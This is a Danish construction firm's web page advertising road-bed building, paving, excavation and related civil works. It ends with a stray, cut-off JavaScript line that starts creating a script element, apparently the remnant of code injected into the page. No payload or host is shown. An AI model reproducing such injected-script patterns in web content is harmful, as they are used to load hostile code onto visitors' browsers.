ALLE FORMER FOR ANLÆGSARBEJDE

Skal der anlægges torve eller helt nye boligområder, udgraves til byggegruber, reetableres vejkasser til nye kommunale vejanlæg og lægges ny asfalt?

EAP Entreprenør & Maskinudlejning ApS varetager alle typer anlægsarbejder og udfører især mange opgaver i forbindelse med:

  • Vejkasser
  • Belægninger
  • Byggegruber

KOMPLETTE LØSNINGER

Vi sikrer kvalitetsbevidste helhedsløsninger, således at vi står for alt i forbindelse med anlægsarbejdet. Det betyder, at vi eksempelvis i forbindelse med etablering af vejkasser står for den indledende terrænregulering for at sikre det helt rigtige fundament for opgaven, ligesom vi også står for eventuel nedgravning af kabler eller kloakrør.

Herefter sikrer vi en kvalitetsbevidst vejkasse, der indeholder en bundsikring, lægning af stabilt grus og det sidste bære- og slidelag med asfalt.

Den komplette løsning indebærer naturligvis eventuel etablering af cykelsti og kantsten samt belægning til fortove.

KVALITETSSIKKERT ARBEJDE TIL TIDEN

Vores dygtige medarbejdere sikrer et kvalitetssikkert og holdbart arbejde med moderne teknikker og materiel samt nyeste udstyr til opmåling og udførelse.

Vi har erfaringen og udstyret til at imødekomme eventuelle udfordringer og problemer undervejs i processen, og vi leverer altid til den aftalte tid og pris.

Kontakt os på telefon, hvis du som byggeentreprenør eller offentlig bygherre mangler en samarbejdspartner til at udføre et professionelt anlægsarbejde.

var d=document; var s=d.createElement(’script’);